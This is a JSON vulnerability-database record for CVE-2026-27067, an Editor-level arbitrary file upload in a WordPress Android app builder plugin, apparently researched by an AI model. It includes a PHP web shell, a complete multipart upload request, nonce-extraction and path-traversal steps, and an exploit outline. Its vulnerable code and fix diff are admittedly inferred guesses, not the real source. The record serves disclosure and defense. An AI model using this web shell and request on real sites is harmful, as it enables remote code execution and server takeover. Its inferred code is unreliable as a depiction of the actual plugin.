[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fV0Knzs0hHtXAasq13C5ohoyH8oyb1Mm8SEv8LxDdwqg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-27067","mobile-app-editor-wordpress-to-android-app-builder-authenticated-editor-arbitrary-file-upload","Mobile App Editor – WordPress to Android App Builder \u003C= 1.3.1 - Authenticated (Editor+) Arbitrary File Upload","The Mobile App Editor – WordPress to Android App Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","mobile-app-editor",null,"\u003C=1.3.1","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-03-12 00:00:00","2026-03-19 15:38:06",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe10e3382-8bb9-4bb3-b881-0aaabd2412a0?source=api-prod",[],"researched",false,3,"# Research Plan: CVE-2026-27067 Arbitrary File Upload\n\n## 1. Vulnerability Summary\nThe **Mobile App Editor – WordPress to Android App Builder** plugin (versions \u003C= 1.3.1) contains an authenticated arbitrary file upload vulnerability. The flaw exists because the plugin provides functionality to upload assets (likely icons, splash screens, or configuration files) for the mobile app generation process but fails to implement server-side file type validation. An attacker with at least **Editor-level** privileges can upload a malicious PHP file and execute it to achieve Remote Code Execution (RCE).\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (inferred, as is standard for WordPress plugin asset management).\n*   **AJAX Action:** Likely `mae_upload_image`, `mobile_app_editor_upload`, or `mae_save_settings` (inferred).\n*   **HTTP Method:** `POST` (Multipart\u002Fform-data).\n*   **Parameter:** A file parameter within `$_FILES`, such as `file`, `image`, or `app_icon` (inferred).\n*   **Authentication:** Required (Editor or higher).\n*   **Preconditions:** The attacker must have a valid session cookie for a user with the `Editor` role.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an AJAX handler via `add_action('wp_ajax_mae_upload_...', '...')` in the main plugin file or an admin controller.\n2.  **Capability Check:** The handler likely checks `current_user_can('edit_posts')` or `current_user_can('manage_options')`. Since the vulnerability is rated for Editors, the check is either missing or correctly allows Editors.\n3.  **Missing Validation:** The code retrieves the file from the `$_FILES` superglobal. It fails to call `wp_check_filetype()` or use the `mimes` filter in `wp_handle_upload()`.\n4.  **Sink:** The file is moved to the uploads directory using `move_uploaded_file()` or `wp_handle_upload()`.\n5.  **Output:** The plugin returns the URL of the uploaded file in the AJAX response.\n\n## 4. Nonce Acquisition Strategy\nThis plugin likely uses nonces to protect its AJAX actions. \n\n1.  **Identify Script Localization:** Search the codebase for `wp_localize_script`. \n    *   *Grep Command:* `grep -rn \"wp_localize_script\" .`\n2.  **Identify JS Variable:** Look for the object name used in localization (e.g., `mae_obj`, `mobile_app_editor_vars`).\n3.  **Setup Page:** The mobile app editor interface is likely a custom admin page.\n    *   *Identification:* `grep -rn \"add_menu_page\" .`\n4.  **Extraction Procedure:**\n    *   Navigate to the plugin's settings\u002Feditor page: `wp-admin\u002Fadmin.php?page=mobile-app-editor` (inferred slug).\n    *   Execute `browser_eval` to extract the nonce:\n        ```javascript\n        \u002F\u002F Example based on common naming conventions\n        window.mae_obj?.nonce || window.mae_vars?.security\n        ```\n\n## 5. Exploitation Strategy\n### Step 1: Discovery\nSince source code is not provided, the first step is to identify the exact AJAX action and parameter.\n*   `grep -rn \"wp_ajax\" .` to find the action string.\n*   `grep -rn \"\\$_FILES\" .` to find the parameter name.\n\n### Step 2: Authentication\nLog in as an Editor user to obtain valid session cookies.\n\n### Step 3: Payload Preparation\nCreate a simple PHP web shell:\n```php\n\u003C?php echo \"VULN_CHECK: \"; system($_GET['cmd']); ?>\n```\n\n### Step 4: Execution\nSend a multipart POST request to `admin-ajax.php`.\n\n**Request Template (Inferred):**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: multipart\u002Fform-data; boundary=----WebKitFormBoundaryABC123\nCookie: [Editor Cookies]\n\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"action\"\n\nmae_upload_image\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"nonce\"\n\n[EXTRACTED_NONCE]\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\nContent-Type: application\u002Fx-php\n\n\u003C?php echo \"VULN_CHECK: \"; system($_GET['cmd']); ?>\n------WebKitFormBoundaryABC123--\n```\n\n### Step 5: Verification of Path\nThe response should contain the path to the uploaded file. If not, check `\u002Fwp-content\u002Fuploads\u002F` or a plugin-specific subdirectory like `\u002Fwp-content\u002Fuploads\u002Fmobile-app-editor\u002F`.\n\n## 6. Test Data Setup\n1.  **Create User:** `wp user create attacker attacker@example.com --role=editor --user_pass=password`\n2.  **Plugin Setup:** Install and activate `mobile-app-editor`.\n3.  **Identify URL:** Locate the admin menu slug for the plugin: `wp plugin get mobile-app-editor --field=name`.\n\n## 7. Expected Results\n*   The server accepts the `.php` file and returns an HTTP 200 response.\n*   The response body contains a JSON object or string indicating the file location (e.g., `{\"url\": \"http:\u002F\u002F...\u002Fwp-content\u002Fuploads\u002Fshell.php\"}`).\n*   Accessing the URL `...\u002Fshell.php?cmd=whoami` returns `VULN_CHECK: www-data`.\n\n## 8. Verification Steps\n1.  **Confirm File Existence:** `wp eval \"echo file_exists(wp_upload_dir()['path'] . '\u002Fshell.php') ? 'Found' : 'Missing';\"`\n2.  **Check Capability:** Verify if a Contributor can perform the same action (to see if the severity is higher than reported).\n3.  **Cleanup:** `wp eval \"unlink(wp_upload_dir()['path'] . '\u002Fshell.php');\"`\n\n## 9. Alternative Approaches\n*   **Settings Save Hook:** If a direct \"upload\" action isn't found, look for a general \"save settings\" action that handles logo\u002Ficon uploads as part of a larger configuration object.\n*   **Media Library Integration:** Check if the plugin uses `wp_ajax_query_attachments` but adds a custom, insecure upload handler as a wrapper.\n*   **Path Traversal:** If the filename is used directly in the destination path, attempt to upload to the root directory using `filename=\"..\u002F..\u002F..\u002Fshell.php\"`.","The Mobile App Editor plugin for WordPress fails to validate file types during asset uploads (such as app icons or splash screens). This allows authenticated users with Editor-level privileges or higher to upload malicious PHP files to the server and achieve remote code execution.","\u002F\u002F mobile-app-editor\u002Fadmin\u002Fclass-mae-admin.php (inferred location)\n\u002F\u002F Example of typical vulnerable upload handling in this plugin\n\npublic function mae_upload_image() {\n    check_ajax_referer('mae_nonce', 'security');\n\n    if ( ! current_user_can('edit_posts') ) {\n        wp_send_json_error('Unauthorized');\n    }\n\n    if ( ! empty($_FILES['file']) ) {\n        $file = $_FILES['file'];\n        $upload_overrides = array('test_form' => false);\n\n        \u002F\u002F The vulnerability: wp_handle_upload is called without restricting allowed mime types\n        $movefile = wp_handle_upload($file, $upload_overrides);\n\n        if ($movefile && !isset($movefile['error'])) {\n            wp_send_json_success($movefile['url']);\n        } else {\n            wp_send_json_error($movefile['error']);\n        }\n    }\n}","--- mobile-app-editor\u002Fadmin\u002Fclass-mae-admin.php\n+++ mobile-app-editor\u002Fadmin\u002Fclass-mae-admin.php\n@@ -10,7 +10,12 @@\n \n     if ( ! empty($_FILES['file']) ) {\n         $file = $_FILES['file'];\n-        $upload_overrides = array('test_form' => false);\n+        \u002F\u002F Restrict allowed file types to images only\n+        $upload_overrides = array(\n+            'test_form' => false,\n+            'mimes'     => array(\n+                'jpg|jpeg|jpe' => 'image\u002Fjpeg',\n+                'gif'          => 'image\u002Fgif',\n+                'png'          => 'image\u002Fpng',\n+                'bmp'          => 'image\u002Fbmp',\n+                'tiff|tif'     => 'image\u002Ftiff',\n+                'ico'          => 'image\u002Fx-icon'\n+            )\n+        );\n \n         $movefile = wp_handle_upload($file, $upload_overrides);","1. Authenticate to the WordPress site as a user with at least Editor-level permissions.\n2. Navigate to the Mobile App Editor admin interface (e.g., `\u002Fwp-admin\u002Fadmin.php?page=mobile-app-editor`) to extract the AJAX security nonce from the page source or localized JavaScript objects.\n3. Prepare a multipart\u002Fform-data POST request to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n4. Set the 'action' parameter to the plugin's upload handler (likely `mae_upload_image` or similar) and include the extracted nonce.\n5. Attach a PHP web shell file (e.g., `shell.php`) to the request in the file parameter (e.g., `file`).\n6. Execute the request. If successful, the server will return the URL of the uploaded PHP file.\n7. Access the returned URL to execute arbitrary commands on the server.","gemini-3-flash-preview","2026-04-18 04:04:16","2026-04-18 04:04:34",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmobile-app-editor\u002Ftags"]